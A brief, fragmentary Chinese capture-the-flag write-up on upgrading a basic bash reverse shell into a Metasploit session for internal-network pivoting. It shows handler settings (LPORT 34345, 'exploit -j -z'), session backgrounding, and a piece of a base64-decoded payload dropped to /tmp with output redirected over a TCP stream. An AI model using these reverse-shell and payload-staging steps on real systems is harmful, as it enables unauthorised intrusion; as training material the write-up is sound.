CTF比赛中,有内网渗透相关的题目,当时只能反弹一个最基本的bash,没办法上传代理工具把内网端口转发出来,由于时间紧没有细想,草草拿了主机的flag就没有继续了,但其实msf在这种情况下是有完善的功能的...取得远端的shell(每一个连接都会以一个session的形式存在,选择对应的session获取对应的shell)
使用background 命令将当前激活的shell切换到后台
注意:
payload...LPORT 34345exploit -j -z
这里不用配置payload,直接使用默认的payload去接bash反弹回的shell就可以....decode_base64($_)')) 2> /dev/null > '/tmp/Epdut' &2指的是将输出重定向到标准错误,而标准错误又被重定向到tcp流中,显示在远端,base64的输入是从刚刚储存的文件中接收来的